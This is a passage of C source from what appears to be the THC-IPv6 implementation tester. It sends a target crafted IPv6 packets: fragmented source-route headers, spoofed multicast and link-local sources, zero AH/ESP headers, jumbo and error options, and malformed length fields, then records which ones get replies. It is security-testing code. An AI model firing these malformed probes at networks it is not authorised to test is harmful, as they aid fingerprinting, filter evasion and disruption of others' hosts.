&pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt3, &pkt_len3, (unsigned char *) &buf, 6) < 0) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ROUTE, buf, hdr->pkt_len - 40 - offset)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 1000, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation hop-by-hop source-route\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 
0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_HDR, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation destination source-route\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_HDR, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; /*** misc icmp solicitations ***/ if (test == 0 || test == count) { printf("Test %2d: node information\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); memcpy(buf, (char*) &count + _TAKE4, 4); memcpy(buf + 4, (char*) &count + _TAKE4, 4); memcpy(buf + 8, dst6, 16); thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00030000, (unsigned char *) &buf, 24, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_INFOREPLY, NXT_ICMP6, ICMP6_INFOREPLY, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: inverse neighbor solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0x01; buf[1] = 0x01; memcpy(buf + 2, srcmac, 6); buf[8] = 0x02; buf[9] = 0x01; memcpy(buf + 10, dstmac, 6); thc_add_icmp6(pkt, &pkt_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_INVNEIGHBORADV, NXT_ICMP6, ICMP6_INVNEIGHBORADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: mobile prefix solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 
sizeof(buf)); buf[0] = 0xc9; buf[1] = 16; memcpy(buf + 2, src6, 16); if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 18) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_MOBILE_PREFIXSOL, 0, count << 16, (unsigned char *) &buf, 18, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_MOBILE_PREFIXADV, NXT_ICMP6, ICMP6_MOBILE_PREFIXADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: certificate solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; i = count << 16; i += 0xffff; memset(buf, 0, sizeof(buf)); buf[0] = 15; buf[1] = 8; buf[2] = 1; buf[3] = 4; buf[4] = 1; buf[5] = '.'; thc_add_icmp6(pkt, &pkt_len, ICMP6_CERTPATHSOL, 0, i, (unsigned char *) &buf, 10, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_CERTPATHADV, NXT_ICMP6, ICMP6_CERTPATHADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with a zero AH extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, 
NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; /* */ if (test == 0 || test == count) { printf("Test %2d: TCP-SYN(1) with a zero AH extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6) < 0) return -1; thc_add_tcp(pkt, &pkt_len, 1, 1, 1, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; /* */ if (test == 0 || test == count) { printf("Test %2d: extension header with two bytes of ping6\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_DST, -1, (unsigned char *) &buf, 6) < 0) return -1; bla[0] = 128; bla[1] = 0; if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, (unsigned char *) &bla, 2) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with a zero ESP extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_ESP, -1, 
(unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping from multicast (local!)\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, mcast6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: frag+source-route to link local\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = lsrc6; // route via ourself routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: frag+source-route to multicast\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = mcast6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: frag+srcroute from link local (local!)\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, lsrc6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, lsrc6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 
hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: frag+srcroute from multicast (local!)\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, mcast6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, mcast6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: direct neighbor solicitation\t\t", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); memcpy(buf, dst6, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if (check_for_reply_n(p, src6, dst6)) tests[count] = 1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: direct neighbor solicitation ttl<255\t", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); memcpy(buf, dst6, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 63, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply_n(p, src6, dst6)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled ignore hop-by-hop option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = NXT_IGNORE; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0xaa, j); i += j; } } buf[i++] = 
1; // padN, length 2 buf[i++] = 2; buf[i++] = count % 256; buf[i++] = count % 256; buf[i++] = 0; // pad1 if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled padding hop-by-hop option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = 1; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0, j); i += j; } } buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = 0; buf[i++] = 0; buf[i++] = 0; // pad1 if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; /* Testing hop-by-hop options does not make much sense as a reply usually will mean that the option is known, ignored or unknown. 
// hop: jumbo 0xc2|4|SIZE|SIZE|SIZE|SIZE // hop: router alert 5|2|0|0 // hop: quickstart 6|6|1|count%256|count%256|count%256|count%256|0 (rfc4782) // hop: calipso 7|16|0xff|0xff|0xff|0xff|2|0xff|crc|crc|0xff|0xff|0xff|0xff|0xff|0xff|0xff|0xff */ /* memset(buf, 0, sizeof(buf)); buf[0] = 7; buf[1] = 12; buf[2] = 0xff; buf[3] = 0xff; buf[4] = 0xff; buf[5] = 0xff; buf[6] = 1; buf[7] = 0xff; buf[8] = 0; buf[9] = 0; memset(buf + 10, 0xff, 8); i = calculate_checksum(buf, 18); buf[8] = i / 256; buf[9] = i % 256; */ if (test == 0 || test == count) { printf("Test %2d: filled ignore destination option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = NXT_IGNORE; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0xaa, j); i += j; } } /* buf[i++] = 0xc9; // mobility, length 16 buf[i++] = 16; memcpy(buf+i, src6, 16); i += 16; buf[i++] = 4; // tunnel max encaps, length 1 buf[i++] = 1; buf[i++] = 0; */ buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = count % 256; buf[i++] = count % 256; buf[i++] = 0; // pad1 if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled padding destination option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; 
for (j = 0; j < 10; j++) { buf[i++] = 1; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0, j); i += j; } } buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = 0; buf[i++] = 0; buf[i++] = 0; // pad1 if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; // dst: mobility 0xc9|0x10|src6 // dst: tunnel max encapsulation 4|1|1 if (test == 0 || test == count) { printf("Test %2d: jumbo option size < 64k\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc2; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: jumbo option size < 64k, length 0\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc2; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char 
*) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: error option in hop-by-hop\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc3; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: error option in dsthdr\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc3; buf[1] = 4; buf[5] = 166; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) 
return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 0 length field\t\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; i = offset; hdr->pkt[4 + i] = 0; // set ip length to 0 hdr->pkt[5 + i] = 0; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_pkt(interface, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: too large length field\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return 